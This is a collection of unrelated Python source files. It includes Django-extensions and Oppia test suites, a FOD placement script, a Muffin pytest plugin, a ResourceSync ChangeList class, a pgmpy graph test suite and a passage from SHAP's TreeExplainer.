self.commands = find_commands(management_dir)
def test_load_commands(self):
"""Try to load every management command to catch exceptions."""
try:
for command in self.commands:
load_command_class('django_extensions', command)
except Exception as e:
self.fail("Can't load command class of {0}\n{1}".format(command, e))
class GraphModelsTests(TestCase):
"""
Tests for the `graph_models` management command.
"""
def test_use_model(self):
include_models = [
'NoWildcardInclude',
'Wildcard*InsideInclude',
'*WildcardPrefixInclude',
'WildcardSuffixInclude*',
'*WildcardBothInclude*'
]
exclude_models = [
'NoWildcardExclude',
'Wildcard*InsideExclude',
'*WildcardPrefixExclude',
'WildcardSuffixExclude*',
'*WildcardBothExclude*'
]
# Any model name should be used if neither include or exclude
# are defined.
self.assertTrue(use_model(
'SomeModel',
None,
None
))
# Any model name should be allowed if `*` is in `include_models`.
self.assertTrue(use_model(
'SomeModel',
['OtherModel', '*', 'Wildcard*Model'],
None
))
# No model name should be allowed if `*` is in `exclude_models`.
self.assertFalse(use_model(
'SomeModel',
None,
['OtherModel', '*', 'Wildcard*Model']
))
# Some tests with the `include_models` defined above.
self.assertFalse(use_model(
'SomeModel',
include_models,
None
))
self.assertTrue(use_model(
'NoWildcardInclude',
include_models,
None
))
self.assertTrue(use_model(
'WildcardSomewhereInsideInclude',
include_models,
None
))
self.assertTrue(use_model(
'MyWildcardPrefixInclude',
include_models,
None
))
self.assertTrue(use_model(
'WildcardSuffixIncludeModel',
include_models,
None
))
self.assertTrue(use_model(
'MyWildcardBothIncludeModel',
include_models,
None
))
# Some tests with the `exclude_models` defined above.
self.assertTrue(use_model(
'SomeModel',
None,
exclude_models
))
self.assertFalse(use_model(
'NoWildcardExclude',
None,
exclude_models
))
self.assertFalse(use_model(
'WildcardSomewhereInsideExclude',
None,
exclude_models
))
self.assertFalse(use_model(
'MyWildcardPrefixExclude',
None,
exclude_models
))
self.assertFalse(use_model(
'WildcardSuffixExcludeModel',
None,
exclude_models
))
self.assertFalse(use_model(
'MyWildcardBothExcludeModel',
None,
exclude_models
))
def test_no_models_dot_py(self):
data = generate_graph_data(['testapp_with_no_models_file'])
self.assertEqual(len(data['graphs']), 1)
model_name = data['graphs'][0]['models'][0]['name']
self.assertEqual(model_name, 'TeslaCar')
class ShowUrlsTests(TestCase):
"""
Tests for the `show_urls` management command.
"""
def test_color(self):
with force_color_support:
out = StringIO()
call_command('show_urls', stdout=out)
self.output = out.getvalue()
self.assertIn('\x1b', self.output)
def test_no_color(self):
with force_color_support:
out = StringIO()
call_command('show_urls', '--no-color', stdout=out)
self.output = out.getvalue()
self.assertNotIn('\x1b', self.output)
class MergeModelInstancesTests(TestCase):
"""
Tests for the `merge_model_instances` management command.
"""
@mock.patch('django_extensions.management.commands.merge_model_instances.apps.get_models')
@mock.patch('django_extensions.management.commands.merge_model_instances.input')
def test_get_model_to_merge(self, test_input, get_models):
class Model(object):
__name__ = ""
return_value = []
for v in ["one", "two", "three"]:
instance = Model()
instance.__name__ = v
return_value.append(instance)
get_models.return_value = return_value
test_input.return_value = 2
model_to_deduplicate = get_model_to_deduplicate()
self.assertEqual(model_to_deduplicate.__name__, "two")
@mock.patch('django_extensions.management.commands.merge_model_instances.input')
def test_get_field_names(self, test_input):
class Field(object):
name = ""
def __init__(self, name):
self.name = name
class Model(object):
__name__ = ""
one = Field(name="one")
two = Field(name="two")
three = Field(name="three")
return_value = [Model().__getattribute__(field) for field in dir(Model()) if not field.startswith("__")]
Model._meta = mock.MagicMock()
Model._meta.get_fields = mock.MagicMock(return_value=return_value)
# Choose the second return_value
test_input.side_effect = [2, "C"]
field_names = get_field_names(Model())
# Test that the second return_value returned
self.assertEqual(field_names, [return_value[1].name])
@mock.patch('django_extensions.management.commands.merge_model_instances.input')
def test_keep_first_or_last_instance(self, test_input):
test_input.side_effect = ["xxxx", "first", "last"]
first_or_last = keep_first_or_last_instance()
self.assertEqual(first_or_last, "first")
first_or_last = keep_first_or_last_instance()
self.assertEqual(first_or_last, "last")
@mock.patch('django_extensions.management.commands.merge_model_instances.get_model_to_deduplicate')
@mock.patch('django_extensions.management.commands.merge_model_instances.get_field_names')
@mock.patch('django_extensions.management.commands.merge_model_instances.keep_first_or_last_instance')
def test_merge_model_instances(self, keep_first_or_last_instance, get_field_names, get_model_to_deduplicate):
get_model_to_deduplicate.return_value = Person
get_field_names.return_value = ["name"]
keep_first_or_last_instance.return_value = "first"
name = Name.objects.create(name="Name")
note = Note.objects.create(note="This is a note.")
personality_1 = Personality.objects.create(
description="Child 1's personality.")
personality_2 = Personality.objects.create(
description="Child 2's personality.")
child_1 = Person.objects.create(
name=Name.objects.create(name="Child1"),
age=10,
personality=personality_1
)
child_1.notes.add(note)
child_2 = Person.objects.create(
name=Name.objects.create(name="Child2"),
age=10,
personality=personality_2
)
child_2.notes.add(note)
club1 = Club.objects.create(name="Club one")
club2 = Club.objects.create(name="Club two")
person_1 = Person.objects.create(
name=name,
age=50,
personality=Personality.objects.create(
description="First personality")
)
person_1.children.add(child_1)
person_1.notes.add(note)
Permission.objects.create(text="Permission", person=person_1)
person_2 = Person.objects.create(
name=name,
age=50,
personality=Personality.objects.create(
description="Second personality")
)
person_2.children.add(child_2)
new_note = Note.objects.create(note="This is a new note")
person_2.notes.add(new_note)
Membership.objects.create(club=club1, person=person_2)
Membership.objects.create(club=club1, person=person_2)
Permission.objects.create(text="Permission", person=person_2)
person_3 = Person.objects.create(
name=name,
age=50,
personality=Personality.objects.create(
description="Third personality")
)
person_3.children.add(child_2)
person_3.notes.add(new_note)
Membership.objects.create(club=club2, person=person_3)
Membership.objects.create(club=club2, person=person_3)
Permission.objects.create(text="Permission", person=person_3)
self.assertEqual(Person.objects.count(), 5)
self.assertEqual(Membership.objects.count(), 4)
out = StringIO()
call_command('merge_model_instances', stdout=out)
self.ouptput = out.getvalue()
self.assertEqual(Person.objects.count(), 3)
person = Person.objects.get(name__name="Name")
self.assertRaises(
Person.DoesNotExist,
lambda: Person.objects.get(
personality__description="Second personality"))
self.assertEqual(person.notes.count(), 2)
self.assertEqual(person.clubs.distinct().count(), 2)
self.assertEqual(person.permission_set.count(), 3)
self.assertRaises(
Personality.DoesNotExist,
lambda: Personality.objects.get(description="Second personality"))
class RunJobsTests(TestCase):
"""
Tests for the `runjobs` management command.
"""
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs_by_signals')
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs')
@mock.patch('django_extensions.management.commands.runjobs.Command.usage_msg')
def test_runjobs_management_command(
self, usage_msg, runjobs, runjobs_by_signals):
when = 'daily'
call_command('runjobs', when)
usage_msg.assert_not_called()
runjobs.assert_called_once()
runjobs_by_signals.assert_called_once()
self.assertEqual(runjobs.call_args[0][0], when)
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs_by_signals')
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs')
@mock.patch('django_extensions.management.commands.runjobs.Command.usage_msg')
def test_runjobs_management_command_invalid_when(
self, usage_msg, runjobs, runjobs_by_signals):
when = 'invalid'
call_command('runjobs', when)
usage_msg.assert_called_once_with()
runjobs.assert_not_called()
runjobs_by_signals.assert_not_called()
def test_runjobs_integration_test(self):
jobs = [
("hourly", HOURLY_JOB_MOCK),
("daily", DAILY_JOB_MOCK),
("monthly", MONTHLY_JOB_MOCK),
("weekly", WEEKLY_JOB_MOCK),
("yearly", YEARLY_JOB_MOCK),
]
# Reset all mocks in case they have been called elsewhere.
for job in jobs:
job[1].reset_mock()
counter = 1
for job in jobs:
call_command('runjobs', job[0], verbosity=2)
for already_called in jobs[:counter]:
already_called[1].assert_called_once_with()
for not_yet_called in jobs[counter:]:
not_yet_called[1].assert_not_called()
counter += 1
def test_runjob_integration_test(self):
jobs = [
("test_hourly_job", HOURLY_JOB_MOCK),
("test_daily_job", DAILY_JOB_MOCK),
("test_monthly_job", MONTHLY_JOB_MOCK),
("test_weekly_job", WEEKLY_JOB_MOCK),
("test_yearly_job", YEARLY_JOB_MOCK),
]
# Reset all mocks in case they have been called elsewhere.
for job in jobs:
job[1].reset_mock()
counter = 1
for job in jobs:
call_command('runjob', job[0], verbosity=2)
for already_called in jobs[:counter]:
already_called[1].assert_called_once_with()
for not_yet_called in jobs[counter:]:
not_yet_called[1].assert_not_called()
counter += 1
|
the-stack_106_19024
|
# coding: utf-8
#
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for feature detection utilities for Python 2 and Python 3."""
from __future__ import annotations
import ast
import builtins
import io
import os
import sys
import unittest
import urllib
from core import python_utils
from core.tests import test_utils
from core.tests.data import unicode_and_str_handler
class PythonUtilsTests(test_utils.GenericTestBase):
"""Tests for feature detection utilities that are common for Python 2 and
Python 3.
"""
def test_get_args_of_function_node(self):
function_txt = b"""def _mock_function(arg1, arg2):
pass"""
ast_node = ast.walk(ast.parse(function_txt))
function_node = [n for n in ast_node if isinstance(n, ast.FunctionDef)]
args_list = python_utils.get_args_of_function_node(function_node[0], [])
self.assertEqual(args_list, ['arg1', 'arg2'])
def test_open_file(self):
with python_utils.open_file(
os.path.join('core', 'python_utils.py'), 'r'
) as f:
file_content = f.readlines()
self.assertIsNotNone(file_content)
def test_can_not_open_file(self):
with self.assertRaisesRegexp(
IOError, 'Unable to open file: invalid_file.py'):
with python_utils.open_file('invalid_file.py', 'r') as f:
f.readlines()
def test_url_open(self):
response = python_utils.url_open('http://www.google.com')
self.assertEqual(response.getcode(), 200)
self.assertEqual(response.url, 'http://www.google.com')
def test_url_request(self):
response = python_utils.url_request('http://www.google.com', None, {})
self.assertEqual(response.get_full_url(), 'http://www.google.com')
def test_divide(self):
self.assertEqual(python_utils.divide(4, 2), 2)
self.assertEqual(python_utils.divide(5, 2), 2)
def test_url_unsplit(self):
response = urllib.parse.urlsplit('http://www.google.com')
self.assertEqual(
python_utils.url_unsplit(response), 'http://www.google.com')
def test_parse_query_string(self):
response = python_utils.parse_query_string(
'http://www.google.com?search=oppia')
self.assertEqual(response, {'http://www.google.com?search': ['oppia']})
def test_urllib_unquote(self):
response = python_utils.urllib_unquote('/El%20Ni%C3%B1o/')
self.assertEqual(response, '/El Niño/')
def test_url_parse(self):
response = python_utils.url_parse('http://www.google.com')
self.assertEqual(response.geturl(), 'http://www.google.com')
def test_recursively_convert_to_str_with_dict(self):
test_var_1_in_unicode = str('test_var_1')
test_var_2_in_unicode = str('test_var_2')
test_var_3_in_bytes = test_var_1_in_unicode.encode(encoding='utf-8')
test_var_4_in_bytes = test_var_2_in_unicode.encode(encoding='utf-8')
test_dict = {
test_var_1_in_unicode: test_var_3_in_bytes,
test_var_2_in_unicode: test_var_4_in_bytes
}
self.assertEqual(
test_dict,
{'test_var_1': b'test_var_1', 'test_var_2': b'test_var_2'})
for key, val in test_dict.items():
self.assertEqual(type(key), str)
self.assertEqual(type(val), builtins.bytes)
dict_in_str = python_utils._recursively_convert_to_str(test_dict) # pylint: disable=protected-access
self.assertEqual(
dict_in_str,
{'test_var_1': 'test_var_1', 'test_var_2': 'test_var_2'})
for key, val in dict_in_str.items():
self.assertEqual(type(key), str)
self.assertEqual(type(val), str)
def test_recursively_convert_to_str_with_nested_structure(self):
test_var_1_in_unicode = str('test_var_1')
test_list_1 = [
test_var_1_in_unicode,
test_var_1_in_unicode.encode(encoding='utf-8'),
'test_var_2',
b'test_var_3',
{'test_var_4': b'test_var_5'}
]
test_dict = {test_var_1_in_unicode: test_list_1}
self.assertEqual(
test_dict,
{
'test_var_1': [
'test_var_1', b'test_var_1', 'test_var_2', b'test_var_3',
{'test_var_4': b'test_var_5'}]
}
)
dict_in_str = python_utils._recursively_convert_to_str(test_dict) # pylint: disable=protected-access
self.assertEqual(
dict_in_str,
{
'test_var_1': [
'test_var_1', 'test_var_1', 'test_var_2', 'test_var_3',
{'test_var_4': 'test_var_5'}]
}
)
for key, value in dict_in_str.items():
self.assertNotEqual(type(key), builtins.bytes)
self.assertTrue(isinstance(key, str))
for item in value:
self.assertNotEqual(type(item), builtins.bytes)
self.assertTrue(isinstance(item, (str, bytes, dict)))
for k, v in value[-1].items():
self.assertEqual(type(k), str)
self.assertEqual(type(v), str)
def test_create_enum_method_and_check_its_values(self):
"""Test create_enum method."""
enums = python_utils.create_enum('first', 'second', 'third')
self.assertEqual(enums.first.value, 'first')
self.assertEqual(enums.second.value, 'second')
self.assertEqual(enums.third.value, 'third')
def test_create_enum_method_and_check_its_names(self):
"""Test create_enum method."""
enums = python_utils.create_enum('first', 'second', 'third')
self.assertEqual(enums.first.name, 'first')
self.assertEqual(enums.second.name, 'second')
self.assertEqual(enums.third.name, 'third')
def test_enum_for_invalid_attribute(self):
enums = python_utils.create_enum('first', 'second', 'third')
with self.assertRaisesRegexp(AttributeError, 'fourth'):
getattr(enums, 'fourth')
@unittest.skipUnless(
sys.version[0] == '3', 'Test cases for ensuring Python 3 behavior only')
class PythonUtilsForPython3Tests(test_utils.GenericTestBase):
"""Tests for feature detection utilities for Python 3."""
def test_string_io(self):
stdout = python_utils.string_io()
self.assertIsInstance(stdout, io.StringIO)
def test_unicode_and_str_chars_in_file(self):
self.assertIsInstance(unicode_and_str_handler.SOME_STR_TEXT, str)
self.assertIsInstance(
unicode_and_str_handler.SOME_UNICODE_TEXT, str)
self.assertIsInstance(
unicode_and_str_handler.SOME_BINARY_TEXT, bytes)
with python_utils.open_file(
'core/tests/data/unicode_and_str_handler.py', 'r') as f:
file_content = f.read()
self.assertIsInstance(file_content, str)
|
the-stack_106_19026
|
#!/usr/bin/env python3
import os
import math
from pointclass import *
from placefods import *
#check for input file
if os.path.exists('fod_input'):
f1=open('fod_input')
else:
print('no fod_input file found')
raise SystemExit(0)
#remove old outputs
if os.path.exists('tmp.xyz'):
os.remove('tmp.xyz')
count=0
for line in f1:
args = line.split()
narg = len(args)
if narg == 0:
continue
#TETRAHEDRON
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# tetrahedron ax ay az size tsize pointto bx by bz (optional: alignto cx cy cz)
if args[0].lower() == 'tetrahedron':
center=Point(float(args[1]),float(args[2]),float(args[3]))
tsize = float(args[5])
bondatom=Point(float(args[7]),float(args[8]),float(args[9]))
if args[10] == 'alignto':
alignatom=Point(float(args[11]),float(args[12]),float(args[13]))
place_tetrahedron(center,tsize,bondatom,alignatom)
else:
place_tetrahedron(center,tsize,bondatom)
count+=4
# 0 1 2 3
# point ax ay az
elif args[0].lower() == 'point':
center=Point(float(args[1]),float(args[2]),float(args[3]))
place_fod(center)
count+=1
#DOUBLE BOND
# 0 1 2 3 4 5 6 7 8 9 10
# db ax ay az bx by bz dist cx cy cz
elif args[0].lower() == 'db':
atom1=Point(float(args[1]),float(args[2]),float(args[3]))
atom2=Point(float(args[4]),float(args[5]),float(args[6]))
dist = float(args[7])
planeatom=Point(float(args[8]),float(args[9]),float(args[10]))
place_doublebond(atom1,atom2,dist,planeatom)
count+=2
print('DONE READING')
#write to xyz with number of FODS on first line
f2=open('new.xyz','w')
line = str(count) + '\n\n'
f2.write(line)
f1=open('tmp.xyz','r')
for line in f1:
f2.write(line)
#remove tmp file
os.remove('tmp.xyz')
#center1=Point(-5,5,5)
#tsize=1.3
#bondatom=Point(0,0,0)
#place_tetrahedron(center1,tsize,bondatom)
# place 1 FOD
#center1=Point(5,5,5)
#place_fod(center1)
#place_COH(oxygencenter,directions)
|
the-stack_106_19030
|
"""Support testing with Pytest."""
import pytest
import os
import logging
from asgi_tools.tests import manage_lifespan
from . import TestClient
def pytest_addoption(parser):
"""Append pytest options for testing Muffin apps."""
parser.addini('muffin_app', 'Set path to muffin application')
parser.addoption('--muffin-app', dest='muffin_app', help='Set to muffin application')
parser.addini('muffin_config', 'Set module path to muffin configuration')
parser.addoption('--muffin-config', dest='muffin_config',
help='Set module path to muffin configuration')
def pytest_load_initial_conftests(early_config, parser, args):
"""Prepare to loading Muffin application."""
from muffin import CONFIG_ENV_VARIABLE
options = parser.parse_known_args(args)
# Initialize configuration
config = options.muffin_config or early_config.getini('muffin_config')
if config:
os.environ[CONFIG_ENV_VARIABLE] = config
# Initialize application
app_ = options.muffin_app or early_config.getini('muffin_app')
early_config.app = app_
@pytest.fixture(scope='session')
async def app(pytestconfig, request, aiolib):
"""Load an application, run lifespan events, prepare plugins."""
if not pytestconfig.app:
logging.warning(
'Improperly configured. Please set ``muffin_app`` in your pytest config. '
'Or use ``--muffin-app`` command option.')
return
from muffin.utils import import_app
app = import_app(pytestconfig.app)
msg = f"Setup application '{app.cfg.name}'"
if app.cfg.config:
msg += f"with config '{app.cfg.config}'"
app.logger.info(msg)
async with manage_lifespan(app):
# Setup plugins
for plugin in app.plugins.values():
if hasattr(plugin, 'conftest') and plugin.conftest is not None:
app.logger.info(f"Setup plugin '{plugin.name}'")
await plugin.conftest()
yield app
@pytest.fixture
def client(app):
"""Generate a test client for the app."""
return TestClient(app)
|
the-stack_106_19031
|
"""ResourceSync ChangeList object.
A ChangeList is a list of resource descriptions which includes
both metadata associated with the resource at some point in
time, and also metadata about a change that may have occurred
to bring the resource to that states. These descriptions
are Resource objects.
Different from an resource_list, a change_list may include multiple
descriptions for the same resource. The change_list is ordered
from first entry to last entry.
Different from an resource_list, dereference by a URI yields a
ChangeList containing descriptions pertaining to that
particular resource.
"""
import collections.abc
from .list_base_with_index import ListBaseWithIndex
from .resource import Resource, ChangeTypeError
from .sitemap import Sitemap
class ChangeList(ListBaseWithIndex):
"""Class representing an Change List."""
def __init__(self, resources=None, md=None, ln=None, uri=None,
mapper=None, spec_version='1.1', add_lastmod=False,
resources_class=list):
"""Initialize ChangeList."""
super(ChangeList, self).__init__(
resources=resources, md=md, ln=ln, uri=uri,
capability_name='changelist', mapper=mapper,
spec_version=spec_version, add_lastmod=add_lastmod,
resources_class=resources_class)
def add_if_changed(self, resource):
"""Add resource if change is not None else ChangeTypeError."""
if (resource.change is not None):
self.resources.append(resource)
else:
raise ChangeTypeError(resource.change)
def add(self, resource):
"""Add a resource change or an iterable collection of them.
Allows multiple resource_change objects for the same
resource (ie. URI) and preserves the order of addition.
"""
if isinstance(resource, collections.abc.Iterable):
for r in resource:
self.add_if_changed(r)
else:
self.add_if_changed(resource)
def add_changed_resources(self, resources, change=None):
"""Add items from a ResourceContainer resources.
If change is specified then the attribute is set in the Resource
objects created.
"""
for resource in resources:
rc = Resource(resource=resource, change=change)
self.add(rc)
def prune_updates_before(self, timestamp, spec_version='1.1'):
"""Remove all resource updates earlier than the given timestamp.
Returns the number of entries removed. Will raise an excpetion
if there are any entries without a datetime (1.1) or
timestamp (1.0).
"""
n = 0
pruned = []
use_timestamp = (spec_version == '1.0') # Else use datetime
for r in self.resources:
ts = r.timestamp if use_timestamp else r.ts_datetime
if (ts is None):
raise Exception("Entry %s has no update datetime/timestamp" % (r.uri))
elif (ts >= timestamp):
pruned.append(r)
else:
n += 1
self.resources = pruned
return(n)
|
the-stack_106_19032
|
import random
import fractions
times = input("How many times do you wan to try: ")
for i in range(int(times)):
print("\n", i + 1, ":", end='')
v = random.randint(1, 250)
m = random.randint(1, 114514) * 100
pMetal = random.randint(ceil(m/v), 200) * 100
pTree = random.randint(5, floor(m/v)) * 100
vMetal = fractions.Fraction(m - pTree * v, pMetal - pTree)
vTree = v - vMetal
# if vMetal <= 0 or vTree <= 0:
# print("FAILED")
# continue
mMetal = pMetal * vMetal
mTree = pTree * vTree
vMetalValue = round(vMetal.numerator/vMetal.denominator, 2)
vTreeValue = round(vTree.numerator/vTree.denominator, 2)
mMetalValue = round(mMetal.numerator/mMetal.denominator, 2)
mTreeValue = round(mTree.numerator/vTree.denominator, 2)
print("一只鲸鱼总容积为 {} 立方米,所能承载的物质质量最大为 {} 千克,现在要用木头和金属放满整只鲸鱼。已知木头的密度为 {} 千克每立方米,金属的密度为 {} 千克每立方米,求应放质量为多少的木头和金属。"
.format(v, m, pTree, pMetal))
print("参考答案:木头质量为{}千克,金属质量为{}千克,木头体积为{}立方米,金属体积为{}立方米。".format(mTreeValue, mMetalValue, vTreeValue, vMetalValue))
print("Done.")
|
the-stack_106_19033
|
'''
Identifiers:
\d any number
\D anything but a number
\s space
\S anything but a space
\w any character
\W anything but a character
. any character, except for a newline
\b the whitespace around words
\. a period
Modifiers:
{1,3} we're expecting 1-3
+ Match 1 or more
? Match 0 or 1
* Match 0 or more
$ match the end of a string
^ matching the beginning of a string
| either or
[] range or "variance" [1-5a-qA-Z]
{x} expecting "x" amount
White Space Characters:
\n new line
\s space
\t tab
\e escape
\f form feed
\r return
DONT FORGET!:
. + * ? [ ] $ ^ ( ) {} | \
'''
import re
exampleString = '''
Jessica is 15 years old, and Daniel is 27 years old.
Edward is 97, and his grandfather, Oscar, is 102.
'''
ages = re.findall(r'\d{1,3}', exampleString)
names = re.findall(r'[A-Z][a-z]*', exampleString)
print(ages)
print(names)
ageDict = {}
x = 0
for eachName in names:
ageDict[eachName] = ages[x]
x+=1
print(ageDict)
|
the-stack_106_19036
|
import logging
# Configure a basic 'securesystemslib' top-level logger with a StreamHandler
# (print to console) and the WARNING log level (print messages of type
# warning, error or critical). This is similar to what 'logging.basicConfig'
# would do with the root logger. All 'securesystemslib.*' loggers default to
# this top-level logger and thus may be configured (e.g. formatted, silenced,
# etc.) with it. It can be accessed via logging.getLogger('securesystemslib').
logger = logging.getLogger(__name__)
logger.setLevel(logging.WARNING)
logger.addHandler(logging.StreamHandler())
|
the-stack_106_19038
|
#!/usr/bin/env python3
from pgmpy.base import UndirectedGraph
from pgmpy.tests import help_functions as hf
import unittest
class TestUndirectedGraphCreation(unittest.TestCase):
def setUp(self):
self.graph = UndirectedGraph()
def test_class_init_without_data(self):
self.assertIsInstance(self.graph, UndirectedGraph)
def test_class_init_with_data_string(self):
self.G = UndirectedGraph([("a", "b"), ("b", "c")])
self.assertListEqual(sorted(self.G.nodes()), ["a", "b", "c"])
self.assertListEqual(
hf.recursive_sorted(self.G.edges()), [["a", "b"], ["b", "c"]]
)
def test_add_node_string(self):
self.graph.add_node("a")
self.assertListEqual(list(self.graph.nodes()), ["a"])
def test_add_node_nonstring(self):
self.graph.add_node(1)
self.assertListEqual(list(self.graph.nodes()), [1])
def test_add_nodes_from_string(self):
self.graph.add_nodes_from(["a", "b", "c", "d"])
self.assertListEqual(sorted(self.graph.nodes()), ["a", "b", "c", "d"])
def test_add_node_with_weight(self):
self.graph.add_node("a")
self.graph.add_node("weight_a", weight=0.3)
self.assertEqual(self.graph.nodes["weight_a"]["weight"], 0.3)
self.assertEqual(self.graph.nodes["a"]["weight"], None)
def test_add_nodes_from_with_weight(self):
self.graph.add_node(1)
self.graph.add_nodes_from(["weight_b", "weight_c"], weights=[0.3, 0.5])
self.assertEqual(self.graph.nodes["weight_b"]["weight"], 0.3)
self.assertEqual(self.graph.nodes["weight_c"]["weight"], 0.5)
self.assertEqual(self.graph.nodes[1]["weight"], None)
def test_add_nodes_from_non_string(self):
self.graph.add_nodes_from([1, 2, 3, 4])
def test_add_edge_string(self):
self.graph.add_edge("d", "e")
self.assertListEqual(sorted(self.graph.nodes()), ["d", "e"])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()), [["d", "e"]])
self.graph.add_nodes_from(["a", "b", "c"])
self.graph.add_edge("a", "b")
self.assertListEqual(
hf.recursive_sorted(self.graph.edges()), [["a", "b"], ["d", "e"]]
)
def test_add_edge_nonstring(self):
self.graph.add_edge(1, 2)
def test_add_edges_from_string(self):
self.graph.add_edges_from([("a", "b"), ("b", "c")])
self.assertListEqual(sorted(self.graph.nodes()), ["a", "b", "c"])
self.assertListEqual(
hf.recursive_sorted(self.graph.edges()), [["a", "b"], ["b", "c"]]
)
self.graph.add_nodes_from(["d", "e", "f"])
self.graph.add_edges_from([("d", "e"), ("e", "f")])
self.assertListEqual(sorted(self.graph.nodes()), ["a", "b", "c", "d", "e", "f"])
self.assertListEqual(
hf.recursive_sorted(self.graph.edges()),
hf.recursive_sorted([("a", "b"), ("b", "c"), ("d", "e"), ("e", "f")]),
)
def test_add_edges_from_nonstring(self):
self.graph.add_edges_from([(1, 2), (2, 3)])
def test_number_of_neighbors(self):
self.graph.add_edges_from([("a", "b"), ("b", "c")])
self.assertEqual(len(list(self.graph.neighbors("b"))), 2)
def tearDown(self):
del self.graph
class TestUndirectedGraphMethods(unittest.TestCase):
def test_is_clique(self):
G = UndirectedGraph(
[
("A", "B"),
("C", "B"),
("B", "D"),
("B", "E"),
("D", "E"),
("E", "F"),
("D", "F"),
("B", "F"),
]
)
self.assertFalse(G.is_clique(nodes=["A", "B", "C", "D"]))
self.assertTrue(G.is_clique(nodes=["B", "D", "E", "F"]))
self.assertTrue(G.is_clique(nodes=["D", "E", "B"]))
def test_is_triangulated(self):
G = UndirectedGraph([("A", "B"), ("A", "C"), ("B", "D"), ("C", "D")])
self.assertFalse(G.is_triangulated())
G.add_edge("A", "D")
self.assertTrue(G.is_triangulated())
|
the-stack_106_19039
|
import numpy as np
import scipy.special
import multiprocessing
import sys
import json
import os
import struct
from distutils.version import LooseVersion
from .explainer import Explainer
from ..common import assert_import, record_import_error, DenseData
import warnings
try:
from .. import _cext
except ImportError as e:
record_import_error("cext", "C extension was not built during install!", e)
try:
import pyspark
except ImportError as e:
record_import_error("pyspark", "PySpark could not be imported!", e)
try:
import xgboost
except ImportError as e:
record_import_error("xgboost", "XGBoost could not be imported!", e)
try:
import lightgbm
except ImportError as e:
record_import_error("lightgbm", "LightGBM could not be imported!", e)
try:
import catboost
except ImportError as e:
record_import_error("catboost", "CatBoost could not be imported!", e)
output_transform_codes = {
"identity": 0,
"logistic": 1,
"logistic_nlogloss": 2,
"squared_loss": 3
}
feature_dependence_codes = {
"independent": 0,
"tree_path_dependent": 1,
"global_path_dependent": 2
}
class TreeExplainer(Explainer):
"""Uses Tree SHAP algorithms to explain the output of ensemble tree models.
Tree SHAP is a fast and exact method to estimate SHAP values for tree models and ensembles of trees,
under several different possible assumptions about feature dependence. It depends on fast C++
implementations either inside an externel model package or in the local compiled C extention.
Parameters
----------
model : model object
The tree based machine learning model that we want to explain. XGBoost, LightGBM, CatBoost,
and most tree-based scikit-learn models are supported.
data : numpy.array or pandas.DataFrame
The background dataset to use for integrating out features. This argument is optional when
feature_dependence="tree_path_dependent", since in that case we can use the number of training
samples that went down each tree path as our background dataset (this is recorded in the model object).
feature_dependence : "tree_path_dependent" (default) or "independent"
Since SHAP values rely on conditional expectations we need to decide how to handle correlated
(or otherwise dependent) input features. The default "tree_path_dependent" approach is to just
follow the trees and use the number of training examples that went down each leaf to represent
the background distribution. This approach repects feature dependecies along paths in the trees.
However, for non-linear marginal transforms (like explaining the model loss) we don't yet
have fast algorithms that respect the tree path dependence, so instead we offer an "independent"
approach that breaks the dependencies between features, but allows us to explain non-linear
transforms of the model's output. Note that the "independent" option requires a background
dataset and its runtime scales linearly with the size of the background dataset you use. Anywhere
from 100 to 1000 random background samples are good sizes to use.
model_output : "margin", "probability", or "log_loss"
What output of the model should be explained. If "margin" then we explain the raw output of the
trees, which varies by model (for binary classification in XGBoost this is the log odds ratio).
If "probability" then we explain the output of the model transformed into probability space
(note that this means the SHAP values now sum to the probability output of the model). If "log_loss"
then we explain the log base e of the model loss function, so that the SHAP values sum up to the
log loss of the model for each sample. This is helpful for breaking down model performance by feature.
Currently the probability and log_loss options are only supported when feature_dependence="independent".
"""
def __init__(self, model, data = None, model_output = "margin", feature_dependence = "tree_path_dependent"):
if str(type(data)).endswith("pandas.core.frame.DataFrame'>"):
self.data = data.values
elif isinstance(data, DenseData):
self.data = data.data
else:
self.data = data
self.data_missing = None if self.data is None else np.isnan(self.data)
self.model_output = model_output
self.feature_dependence = feature_dependence
self.expected_value = None
self.model = TreeEnsemble(model, self.data, self.data_missing)
assert feature_dependence in feature_dependence_codes, "Invalid feature_dependence option!"
# check for unsupported combinations of feature_dependence and model_outputs
if feature_dependence == "tree_path_dependent":
assert model_output == "margin", "Only margin model_output is supported for feature_dependence=\"tree_path_dependent\""
else:
assert data is not None, "A background dataset must be provided unless you are using feature_dependence=\"tree_path_dependent\"!"
if model_output != "margin":
if self.model.objective is None and self.model.tree_output is None:
raise Exception("Model does have a known objective or output type! When model_output is " \
"not \"margin\" then we need to know the model's objective or link function.")
# A bug in XGBoost fixed in v0.81 makes XGBClassifier fail to give margin outputs
if str(type(model)).endswith("xgboost.sklearn.XGBClassifier'>") and model_output != "margin":
assert_import("xgboost")
assert LooseVersion(xgboost.__version__) >= LooseVersion('0.81'), \
"A bug in XGBoost fixed in v0.81 makes XGBClassifier fail to give margin outputs! Please upgrade to XGBoost >= v0.81!"
# compute the expected value if we have a parsed tree for the cext
if self.model_output == "logloss":
self.expected_value = self.__dynamic_expected_value
elif data is not None:
self.expected_value = self.model.predict(self.data, output=model_output).mean(0)
if hasattr(self.expected_value, '__len__') and len(self.expected_value) == 1:
self.expected_value = self.expected_value[0]
elif hasattr(self.model, "node_sample_weight"):
self.expected_value = self.model.values[:,0].sum(0)
if self.expected_value.size == 1:
self.expected_value = self.expected_value[0]
self.expected_value += self.model.base_offset
def __dynamic_expected_value(self, y):
""" This computes the expected value conditioned on the given label value.
"""
return self.model.predict(self.data, np.ones(self.data.shape[0]) * y, output=self.model_output).mean(0)
def shap_values(self, X, y=None, tree_limit=None, approximate=False):
""" Estimate the SHAP values for a set of samples.
Parameters
----------
X : numpy.array, pandas.DataFrame or catboost.Pool (for catboost)
